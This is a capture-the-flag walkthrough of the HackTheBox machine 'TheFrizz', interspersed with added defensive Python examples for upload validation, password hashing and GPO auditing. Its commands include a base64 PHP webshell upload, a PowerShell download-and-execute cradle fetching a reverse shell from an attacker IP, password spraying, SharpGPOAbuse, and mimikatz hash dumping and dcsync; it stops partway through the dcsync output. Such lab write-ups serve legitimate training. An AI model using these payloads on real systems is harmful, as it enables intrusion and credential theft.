HackTheBox TheFrizz Walkthrough

System: Windows
Topics: Kerberos login over SSH, GPO abuse

A heads-up first: this machine is not particularly stable.
The port scan results are as follows.

PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-16 08:16:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
51211/tcp open  msrpc         Microsoft Windows RPC
51220/tcp open  msrpc         Microsoft Windows RPC
51248/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Add frizz.htb and frizzdc.frizz.htb to the hosts file.
Under the Gibbon-LMS directory there is a page that references a local file.

Use the Gibbon-LMS upload vulnerability to upload a shell. This is probably the hardest part of the user stage.

~/D/t $curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=s_shell.php" \
--data-urlencode "gibbonPersonID=0000000001"
s_shell.php 
~/D/t $curl http://frizzdc.frizz.htb/Gibbon-LMS/s_shell.php?cmd=whoami
frizz\w.webservice
frizz\w.webservice 
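The request above works because the endpoint accepts a client-supplied data URI, decodes whatever follows the comma without checking it, and writes the result to a client-supplied `path` inside the web root. The Python below is an added example, not Gibbon's code, of how such a handler should treat that input: a strict data-URI grammar, an allowlist of MIME types, magic-byte verification of the decoded bytes, a size limit, and a server-chosen filename and extension so that `path=s_shell.php` has no effect. The `ALLOWED` table, `MAX_BYTES` and `PNG_SAMPLE` are assumed/constructed values for illustration.

```python
import base64
import os
import re
import secrets
from typing import Tuple

# Allowlist (assumed for this example): declared MIME type -> (magic bytes the
# decoded payload must start with, extension the server assigns).
ALLOWED = {
    "image/png": (b"\x89PNG\r\n\x1a\n", "png"),
    "image/jpeg": (b"\xff\xd8\xff", "jpg"),
    "image/gif": (b"GIF8", "gif"),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed limit

# Strict grammar: exactly `data:<type>/<subtype>;base64,<payload>`. Free-form
# parameters such as the `;asdf` in the request above do not match.
DATA_URI_RE = re.compile(r"^data:([a-z0-9.+-]+/[a-z0-9.+-]+);base64,([A-Za-z0-9+/=\s]*)$")

# Constructed sample: the 8-byte PNG signature followed by filler, enough to
# exercise the checks (not a renderable image).
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32


class UploadRejected(ValueError):
    pass


def encode_data_uri(mime: str, data: bytes) -> str:
    """Build a data URI in the form the validator accepts (used by the demo below)."""
    return f"data:{mime};base64," + base64.b64encode(data).decode("ascii")


def parse_image_data_uri(value: str) -> Tuple[str, bytes]:
    """Validate and decode a client-supplied data URI; raise UploadRejected on any defect."""
    m = DATA_URI_RE.match(value.strip())
    if not m:
        raise UploadRejected("malformed data URI")
    mime, payload = m.group(1).lower(), re.sub(r"\s+", "", m.group(2))
    if mime not in ALLOWED:
        raise UploadRejected(f"MIME type not allowed: {mime}")
    try:
        data = base64.b64decode(payload, validate=True)
    except ValueError as exc:  # binascii.Error is a ValueError subclass
        raise UploadRejected("payload is not valid base64") from exc
    if len(data) > MAX_BYTES:
        raise UploadRejected("payload too large")
    if not data.startswith(ALLOWED[mime][0]):
        # Declared type and content disagree, e.g. script source labelled image/png.
        raise UploadRejected("content does not match declared MIME type")
    return mime, data


def classify(value: str) -> str:
    """'accepted' or the rejection reason: convenient for request logging."""
    try:
        parse_image_data_uri(value)
        return "accepted"
    except UploadRejected as exc:
        return f"rejected: {exc}"


def store_image(value: str, upload_dir: str) -> str:
    """Write the validated bytes under a server-chosen random name and extension;
    the client never influences the path, so there is nothing to traverse."""
    mime, data = parse_image_data_uri(value)
    name = f"{secrets.token_hex(16)}.{ALLOWED[mime][1]}"
    os.makedirs(upload_dir, exist_ok=True)
    fd = os.open(os.path.join(upload_dir, name), os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return name


if __name__ == "__main__":
    import tempfile

    print(classify(encode_data_uri("image/png", PNG_SAMPLE)))
    print(classify("image/png;asdf,PD9waHA="))               # shape of the request above
    print(classify(encode_data_uri("image/png", b"<?php")))  # wrong magic bytes
    with tempfile.TemporaryDirectory() as d:
        print("stored as", store_image(encode_data_uri("image/png", PNG_SAMPLE), d))
```

The upload directory should additionally sit outside the web root or have script execution disabled, so that even a validation miss cannot turn a stored file into an executable page.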

After confirming the shell was uploaded successfully, start a PHP server locally.

~/D/t $sudo php -S 0.0.0.0:80
[Sun Mar 16 08:49:05 2025] PHP 8.4.4 Development Server (http://0.0.0.0:80) started
[Sun Mar 16 08:49:19 2025] 10.10.11.60:60589 Accepted
[Sun Mar 16 08:49:19 2025] 10.10.11.60:60589 [200]: GET /rev.ps1
[Sun Mar 16 08:49:19 2025] 10.10.11.60:60589 Closing

Then have the shell run the command that launches the reverse shell; note that the argument must be URL-encoded.

~/D/t $curl http://frizzdc.frizz.htb/Gibbon-LMS/s_shell.php?cmd=powershell%2Eexe%20%2Dc%20IEX%28New%2DObject%20Net%2EWebClient%29%2EDownloadString%28%27http%3A%2F%2F10%2E10%2E16%2E2%2Frev%2Eps1%27%29

Listening on the local port gives an interactive shell.

~/D/t $rlwrap nc -nlvp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.11.60 60590
SHELL> whoami
frizz\w.webservice

Reading the site's config file config.php gives the database connection password.

SHELL> type config.php
...
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';

Take a look at the domain users.

SHELL> net user

User accounts for \\FRIZZDC

-------------------------------------------------------------------------------
a.perlstein              Administrator            c.ramon
c.sandiego               d.hudson                 f.frizzle
g.frizzle                Guest                    h.arm
J.perlstein              k.franklin               krbtgt
l.awesome                m.ramon                  M.SchoolBus
p.terese                 r.tennelli               t.wright
v.frizzle                w.li                     w.Webservice
The command completed successfully.

Because the shell is not fully interactive, entering mysql's interactive mode is a problem, so query the database contents directly from the command line, which yields a password hash.

SHELL> cd mysql\bin
SHELL> .\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 --database=gibbon -e "SHOW TABLES;"
...
gibbonperson
...
SHELL> .\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 --database=gibbon -e "SELECT * FROM gibbonperson;"
gibbonPersonID  title   surname firstName       preferredName   officialName    nameInCharacters       gender  username        passwordStrong  passwordStrongSalt      passwordForceReset     status  canLogin        gibbonRoleIDPrimary     gibbonRoleIDAll dob   email    emailAlternate  image_240       lastIPAddress   lastTimestamp   lastFailIPAddress      lastFailTimestamp       failCount       address1        address1District      address1Country  address2        address2District        address2Country phone1Type    phone1CountryCode        phone1  phone3Type      phone3CountryCode       phone3  phone2Type     phone2CountryCode       phone2  phone4Type      phone4CountryCode       phone4website  languageFirst   languageSecond  languageThird   countryOfBirth  birthCertificateScan   ethnicity       religion        profession      employer        jobTitle      emergency1Name   emergency1Number1       emergency1Number2       emergency1Relationshipemergency2Name   emergency2Number1       emergency2Number2       emergency2RelationshipgibbonHouseID    studentID       dateStart       dateEnd gibbonSchoolYearIDClassOf     lastSchool       nextSchool      departureReason transport       transportNotes  calendarFeedPersonal   viewCalendarSchool      viewCalendarPersonal    viewCalendarSpaceBooking       gibbonApplicationFormID lockerNumber    vehicleRegistration     personalBackground     messengerLastRead       privacy dayType gibbonThemeIDPersonal   gibboni18nIDPersonal   studentAgreements       googleAPIRefreshToken   microsoftAPIRefreshToken      genericAPIRefreshToken   receiveNotificationEmails       mfaSecret       mfaToken      cookieConsent    fields
0000000001      Ms.     Frizzle Fiona   Fiona   Fiona Frizzle           Unspecified   f.frizzle        067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03      /aACFhikmNopqrRTVz2489   N       Full    Y       001     001     NULL    f.frizzle@frizz.htb    NULL    NULL    ::1     2024-10-29 09:28:59     NULL    NULL    0             NULL             NULL    NULL    NULL                                                  YY       N       NULL                            NULL    NULL    NULL    NULL    NULL  NULL                             Y       NULL    NULL    NULL

hashcat can crack the password; mind the correct hash file format.

~/D/t $cat hash.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
~/D/t $hashcat -m 1420 hash.txt --wordlist /usr/share/wordlists/rockyou.txt
...
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
...
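hashcat mode 1420 is sha256($salt.$pass): a single SHA-256 over the salt followed by the password, which is how the passwordStrong/passwordStrongSalt pair above is stored. The Python below is an added example (not part of the walkthrough or of Gibbon) that reproduces that check against the values above and contrasts it with a memory-hard KDF from the standard library, to show why a salted but fast hash still falls to a wordlist in seconds; the scrypt parameters are illustrative, not anything Gibbon uses.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Values from the walkthrough above: the gibbonperson row and hashcat's result.
PAGE_HASH = "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03"
PAGE_SALT = "/aACFhikmNopqrRTVz2489"
PAGE_PASSWORD = "Jenni_Luvs_Magic23"


def gibbon_hash(password: str, salt: str) -> str:
    """sha256(salt || password) as lowercase hex: hashcat mode 1420, sha256($salt.$pass)."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def gibbon_verify(stored_hash: str, salt: str, candidate: str) -> bool:
    """Constant-time comparison of a candidate password against the stored hash."""
    return hmac.compare_digest(gibbon_hash(candidate, salt), stored_hash.lower())


def hashcat_line(stored_hash: str, salt: str) -> str:
    """Mode 1420 expects one `hash:salt` per line, which is what hash.txt above contains."""
    return f"{stored_hash}:{salt}"


def kdf_hash(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Memory-hard alternative (scrypt from the stdlib). Parameters are illustrative:
    n=2**14, r=8 costs about 16 MiB and tens of milliseconds per guess, against
    microseconds for one SHA-256, which is what makes offline cracking impractical."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, n=2 ** 14, r=8, p=1, dklen=32)
    return salt, digest


def kdf_verify(password: str, salt: bytes, expected: bytes) -> bool:
    return hmac.compare_digest(kdf_hash(password, salt)[1], expected)


if __name__ == "__main__":
    print("hash.txt line:", hashcat_line(PAGE_HASH, PAGE_SALT))
    print("cracked password verifies:", gibbon_verify(PAGE_HASH, PAGE_SALT, PAGE_PASSWORD))
    salt, digest = kdf_hash("example-only-password")
    print("scrypt verify:", kdf_verify("example-only-password", salt, digest))
```

The per-user salt only prevents precomputed tables; it does nothing about guess rate, which is the property a password store actually needs.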

Attempting to authenticate with NTLM reports that it is not supported.

~/D/t $/opt/check_auth.sh -u f.frizzle -p Jenni_Luvs_Magic23  $IP
Running: netexec smb 10.10.11.60 -u f.frizzle -p Jenni_Luvs_Magic23
SMB                      10.10.11.60     445    10.10.11.60      [*]  x64 (name:10.10.11.60) (domain:10.10.11.60) (signing:True) (SMBv1:False)
SMB                      10.10.11.60     445    10.10.11.60      [-] 10.10.11.60\f.frizzle:Jenni_Luvs_Magic23 STATUS_NOT_SUPPORTED
----------------------------------------
Running: netexec winrm 10.10.11.60 -u f.frizzle -p Jenni_Luvs_Magic23

----------------------------------------
Running: netexec ldap 10.10.11.60 -u f.frizzle -p Jenni_Luvs_Magic23
LDAP                     10.10.11.60     389    frizzdc.frizz.htb [*]  x64 (name:frizzdc.frizz.htb) (domain:frizz.htb) (signing:True) (SMBv1:False)
LDAP                     10.10.11.60     389    frizzdc.frizz.htb [-] frizz.htb\f.frizzle:Jenni_Luvs_Magic23 STATUS_NOT_SUPPORTED
----------------------------------------

Looks like Kerberos authentication is required. Get a ticket first.

~/D/t $sudo ntpdate -u $IP
2025-03-16 16:12:20.563492 (+0100) +24108.979646 +/- 0.047245 10.10.11.60 s1 no-leap
CLOCK: time stepped by 24108.979646

~/D/t $impacket-getTGT frizz.htb/f.frizzle:Jenni_Luvs_Magic23 -k  -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in f.frizzle.ccache

~/D/t $export KRB5CCNAME=f.frizzle.ccache

With the ticket, Kerberos can log in to SMB and LDAP.

~/D/t $netexec smb frizzdc.frizz.htb -d frizz.htb  -k --use-kcache
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\f.frizzle from ccache

~/D/t $netexec winrm frizzdc.frizz.htb -d frizz.htb  -k --use-kcache

~/D/t $netexec ldap frizzdc.frizz.htb -d frizz.htb  -k --use-kcache
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb [*]  x64 (name:frizzdc.frizz.htb) (domain:frizz.htb) (signing:True) (SMBv1:False)
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb [+] frizz.htb\f.frizzle from ccache

Now BloodHound data can be collected.

~/D/t $netexec ldap frizzdc.frizz.htb -d frizz.htb  -k --use-kcache --bloodhound --collection All --dns-server $IP
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb [*]  x64 (name:frizzdc.frizz.htb) (domain:frizz.htb) (signing:True) (SMBv1:False)
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb [+] frizz.htb\f.frizzle from ccache
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb Resolved collection methods: session, dcom, localadmin, group, objectprops, psremote, rdp, trusts, acl, container
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb Using kerberos auth without ccache, getting TGT
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb Using kerberos auth from ccache
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb Done in 00M 24S
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb Compressing output into /home/kali/.nxc/logs/frizzdc.frizz.htb_frizzdc.frizz.htb_2025-03-16_162223_bloodhound.zip

BloodHound shows that f.frizzle is a member of the WinRM users group. Testing shows WinRM login fails, but SSH works (because the machine is unstable, SSH sometimes fails as well). /etc/krb5.conf must be set up beforehand. That gets the user flag.

~/D/t $cat /etc/krb5.conf
[libdefaults]
        default_realm = FRIZZ.HTB

[realms]
        FRIZZ.HTB = {
                kdc = frizzdc.frizz.htb
                admin_server = frizzdc.frizz.htb
        }

[domain_realm]
        frizz.htb = FRIZZ.HTB
        .frizz.htb = FRIZZ.HTB

~/D/t $evil-winrm -i frizzdc.frizz.htb  -r frizz.htb
...
Error: An error of type HTTPClient::ConnectTimeoutError happened, message is execution expired

Error: Exiting with code 1
malloc(): unaligned fastbin chunk detected
zsh: IOT instruction  evil-winrm -i frizzdc.frizz.htb -r frizz.htb
~/D/t $ssh f.frizzle@$IP
The authenticity of host '10.10.11.60 (10.10.11.60)' can't be established.
ED25519 key fingerprint is SHA256:667C2ZBnjXAV13iEeKUgKhu6w5axMrhU346z2L2OE7g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.60' (ED25519) to the list of known hosts.
PowerShell 7.4.5
PS C:\Users\f.frizzle> whoami
frizz\f.frizzle
PS C:\Users\f.frizzle> tree . /F
Folder PATH listing
Volume serial number is 000001EF D129:C3DA
C:\USERS\F.FRIZZLE
├───Desktop
│       user.txt
│
├───Documents
├───Downloads
├───Favorites
├───Links
├───Music
├───Pictures
├───Saved Games
└───Videos

Next, work out how to get root. Uploading winPEAS found nothing useful, but the Recycle Bin contains a hidden directory with files.

PS C:\$RECYCLE.BIN> dir  -Force

    Directory: C:\$RECYCLE.BIN

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d--hs          10/29/2024  7:31 AM                S-1-5-21-2386970044-1145388522-2932701813-1103

PS C:\$RECYCLE.BIN> dir S-1-5-21-2386970044-1145388522-2932701813-1103

    Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a---          10/29/2024  7:31 AM            148 $IE2XMEG.7z
-a---          10/24/2024  9:16 PM       30416987 $RE2XMEG.7z

Copy these two archives down.

~/D/t $scp -o GSSAPIAuthentication=yes -o GSSAPIDelegateCredentials=yes f.frizzle@$IP:'c:/temp/IE2XMEG.7z' ./
IE2XMEG.7z                                          100%  148     0.8KB/s   00:00
~/D/t $scp -o GSSAPIAuthentication=yes -o GSSAPIDelegateCredentials=yes f.frizzle@$IP:'c:/temp/RE2XMEG.7z' ./
RE2XMEG.7z                                          100%   29MB   3.7MB/s   00:07

Extract locally; this produces a wapt directory.

~/D/t $7z x  RE2XMEG.7z

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=C.UTF-8 Threads:4 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 30416987 bytes (30 MiB)

Extracting archive: RE2XMEG.7z
--
Path = RE2XMEG.7z
Type = 7z
Physical Size = 30416987
Headers Size = 65880
Method = ARM64 LZMA2:26 LZMA:20 BCJ2
Solid = +
Blocks = 3

Everything is Ok

Folders: 684
Files: 5384
Size:       141187501
Compressed: 30416987

After extraction, a password is found in a config file.

~/D/t/w/c $cat waptserver.ini
[options]
allow_unauthenticated_registration = True
wads_enable = True
login_on_wads = True
waptwua_enable = True
secret_key = ylPYfn9tTU9IDu9yssP2luKhjQijHKvtuxIzX9aWhPyYKtRO7tMSq5sEurdTwADJ
server_uuid = 646d0847-f8b8-41c3-95bc-51873ec9ae38
token_secret_key = 5jEKVoXmYLSpi5F7plGPB4zII5fpx0cYhGKX5QC0f7dkYpYmkeTXiFlhEJtZwuwD
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
clients_signing_key = C:\wapt\conf\ca-192.168.120.158.pem
clients_signing_certificate = C:\wapt\conf\ca-192.168.120.158.crt

[tftpserver]
root_dir = c:\wapt\waptserver\repository\wads\pxe
log_path = c:\wapt\log
~/D/t $echo  IXN1QmNpZ0BNZWhUZWQhUgo= |base64 -d
!suBcig@MehTed!R

Password spraying shows that this password belongs to the m.schoolbus user.

~/D/t $kerbrute_linux_amd64 passwordspray  --dc frizzdc.frizz.htb -d frizz.htb names.txt '!suBcig@MehTed!R'

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 03/19/25 - Ronnie Flathers @ropnop

2025/03/19 13:23:38 >  Using KDC(s):
2025/03/19 13:23:38 >   frizzdc.frizz.htb:88

2025/03/19 13:23:39 >  [+] VALID LOGIN:  M.SchoolBus@frizz.htb:!suBcig@MehTed!R
2025/03/19 13:23:39 >  Done! Tested 21 logins (1 successes) in 0.664 seconds

Next, get a ticket for M.SchoolBus and log in over SSH.

~/D/t $impacket-getTGT frizz.htb/M.SchoolBus:'!suBcig@MehTed!R' -k  -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in M.SchoolBus.ccache

~/D/t $export KRB5CCNAME=M.SchoolBus.ccache

~/D/t $ssh M.SchoolBus@$IP
PS C:\Users\M.SchoolBus> whoami
frizz\m.schoolbus

BloodHound shows that M.SchoolBus is a member of the Group Policy Creator Owners group.

Next, use that Group Policy permission for GPO abuse.

PS C:\Users\M.SchoolBus\Downloads> New-GPO -Name "whatever"

DisplayName      : whatever
DomainName       : frizz.htb
Owner            : frizz\M.SchoolBus
Id               : 395e9018-e87e-4ef4-aa68-e4e9667da882
GpoStatus        : AllSettingsEnabled
Description      :
CreationTime     : 3/19/2025 5:49:59 AM
ModificationTime : 3/19/2025 5:49:59 AM
UserVersion      :
ComputerVersion  :
WmiFilter        :

PS C:\Users\M.SchoolBus\Downloads> New-GPLink -Name "whatever" -Target "OU=Domain Controllers,DC=frizz,DC=htb"

GpoId       : 395e9018-e87e-4ef4-aa68-e4e9667da882
DisplayName : whatever
Enabled     : True
Enforced    : False
Target      : OU=Domain Controllers,DC=frizz,DC=htb
Order       : 2

PS C:\Users\M.SchoolBus\Downloads> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName whatever
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "whatever" is: {395E9018-E87E-4EF4-AA68-E4E9667DA882}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{395E9018-E87E-4EF4-AA68-E4E9667DA882}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

PS C:\Users\M.SchoolBus\Downloads> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.
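SharpGPOAbuse's --AddLocalAdmin writes a Restricted Groups entry into the GPO's GptTmpl.inf under SYSVOL (the path in the output above) and bumps the GPT.ini version so clients apply it, and that file is what a defender can audit. The Python below is an added detection example, not from the walkthrough or any tool it uses: it parses a GptTmpl.inf, inspects the [Group Membership] section, and reports any entry that adds principals to a privileged built-in group such as Administrators (S-1-5-32-544), in either direction the format allows. SAMPLE_GPTTMPL is constructed to show the shape of such an entry; load_gpttmpl reads a real file, which Windows writes as UTF-16 with a BOM.

```python
from dataclasses import dataclass
from typing import Dict, List

# Built-in groups whose membership a GPO should not be quietly rewriting on a
# domain controller (assumed watch list; extend as needed).
PRIVILEGED_GROUP_SIDS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-551": "Backup Operators",
    "S-1-5-32-555": "Remote Desktop Users",
}

# Constructed sample showing the shape of a Restricted Groups entry that adds a
# domain principal to the local Administrators group; not copied from the box.
SAMPLE_GPTTMPL = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-2386970044-1145388522-2932701813-1106
"""


@dataclass
class Finding:
    group_sid: str
    group_name: str
    members: List[str]


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI reader: GptTmpl.inf keys contain '*' and '__', which
    configparser would lower-case or choke on, so keys are kept verbatim."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip()] = value.strip()
    return sections


def _split_sids(value: str) -> List[str]:
    """Values are comma-separated, each SID prefixed with '*'."""
    return [v.strip().lstrip("*") for v in value.split(",") if v.strip()]


def restricted_group_findings(text: str) -> List[Finding]:
    """Report [Group Membership] entries that put principals into a privileged group:
    <group>__Members = <principals>  or  <principal>__Memberof = <groups>."""
    findings: List[Finding] = []
    for key, value in parse_ini(text).get("Group Membership", {}).items():
        subject, sep, direction = key.lstrip("*").rpartition("__")
        if not sep:
            continue
        if direction == "Members" and subject in PRIVILEGED_GROUP_SIDS and _split_sids(value):
            findings.append(Finding(subject, PRIVILEGED_GROUP_SIDS[subject], _split_sids(value)))
        elif direction == "Memberof":
            for group in _split_sids(value):
                if group in PRIVILEGED_GROUP_SIDS:
                    findings.append(Finding(group, PRIVILEGED_GROUP_SIDS[group], [subject]))
    return findings


def load_gpttmpl(path: str) -> str:
    """Read a real GptTmpl.inf: UTF-16 with BOM as Windows writes it, or plain text."""
    with open(path, "rb") as f:
        raw = f.read()
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig")


if __name__ == "__main__":
    for finding in restricted_group_findings(SAMPLE_GPTTMPL):
        print(f"{finding.group_name} ({finding.group_sid}) gains: {', '.join(finding.members)}")
```

Run it over every `Policies\{GUID}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf` under SYSVOL on a schedule, and pair it with alerting on new GPOs linked to the Domain Controllers OU (directory service change events) so a freshly created policy like "whatever" is noticed before the refresh cycle applies it.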

PS C:\Users\M.SchoolBus\Downloads> .\RunasCs.exe "M.SchoolBus"  '!suBcig@MehTed!R' powershell.exe -r 10.10.16.2:1234

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-330d59$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2628 created in background.

The local listener receives a reverse shell with system-level privileges.

PS C:\Windows\system32> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

Upload mimikatz to obtain the administrator's hash.

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

568     {0;000003e7} 1 D 36007          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)     Primary
 -> Impersonated !
 * Process Token : {0;0009c0bc} 0 D 651587      frizz\M.SchoolBus       S-1-5-21-2386970044-1145388522-2932701813-1106        (16g,26p)       Primary
 * Thread Token  : {0;000003e7} 1 D 727973      NT AUTHORITY\SYSTEM     S-1-5-18     (04g,21p)        Impersonation (Delegation)

mimikatz # lsadump::sam
Domain : FRIZZDC
SysKey : 02a7ae01010ecbfb70406e489a435ec7
Local SID : S-1-5-21-3873670720-2504411258-3912888090

SAMKey : 955b8e610ae76fc77ed8f9dc041048be

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: c299f8b2acc2da429d3a35953b3854d7

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz # lsadump::dcsync /domain:frizz.htb /user:Administrator
[DC] 'frizz.htb' will be the domain
[DC] 'frizzdc.frizz.htb' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   :
Password last change : 2/25/2025 2:24:10 PM
Object Security ID   : S-1-5-21-2386970044-1145388522-2932701813-500
Object Relative ID   : 500

